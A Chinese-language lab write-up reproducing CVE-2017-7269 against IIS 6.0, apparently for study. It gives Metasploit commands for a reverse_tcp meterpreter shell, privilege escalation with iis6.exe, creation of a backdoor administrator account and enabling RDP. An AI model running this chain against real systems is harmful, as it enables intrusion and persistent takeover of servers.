iis6.0遠程代碼執行漏洞復現(CVE-2017-7269)

一.實驗環境搭建

1.目標機:windows server 2003 r2

2.iis配置

目標機ip:192.168.1.175

二.攻擊機器

一臺kai liunx

ip:192.168.1.144

三.開始攻擊了

exp:https://github.com/zcgonvh/cve-2017-7269


1.把exp 複製到攻擊機器的/usr/share/metasploit-framework/modules/exploits/windows/iis目錄下

2.打開神器Metasploit

3.輸入use命令,use exploit/windows/iis/cve-2017-7269

4.使用命令show options

5.設置目標機ip,set RHOST 192.168.1.175

6.設置對面網站,set HttpHost 192.168.1.175

7.設置返回載荷,set payload windows/meterpreter/reverse_tcp

8.設置攻擊機ip,set LHOST 192.168.1.144

9.進行溢出,exploit

10.如果出現錯誤Exploit completed, but no session was created,有可能是攻擊的過多,可以嘗試重啓,實在不行就恢復快照

11.輸入shell命令,來到了我們所熟悉的界面

12.查看當前用戶權限,whoami,發現只是個一般用戶權限

13.cd到網站目錄,命令:c:\Inetpub\wwwroot,但是小編這裏是沒有權限進行創建文件,文件夾等操作的

14.來到c盤根目錄,cd c:\,進行新建文件夾,發現創建成功(實際情況中就只有一個文件夾一個文件夾的尋找了)

14.按Ctrl + C退出shell,輸出y

15.利用Metasploit的上傳功能,把提權工具iis6.exe上傳到剛剛新建的文件裏(提權工具有很多,iis6.exe,pr.exe等等)


16.又回到shell裏面確定工具上傳是否成功

17.利用工具進行提權,命令:iis6.exe "whoami",已經是system權限了

18.進行新建用戶,iis6.exe "net user DarkHQ !@#qwe123 /add"

19.添加用戶到管理員,iis6.exe "net localhost administrators DarkHQ /add"

20.查看遠程連接是否打開,沒有打開,命令:netstat -an

21.再上傳一個開3389.bat,利用iis6.exe運行,打開目標機的3389端口(上傳3389.bat的方法和上面iis6.exe上傳方法一樣)

命令:iis6.exe "3389.bat"

22.查看是否打開,netstat -an,已經成功打開


23.進行遠程連接,本地cmd輸入命令:mstsc

24.利用之前新建的管理員成功登錄

感謝各位大佬賞臉,有什麼不足的地方請多多指教,歡迎意見轟炸,謝謝!!!


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章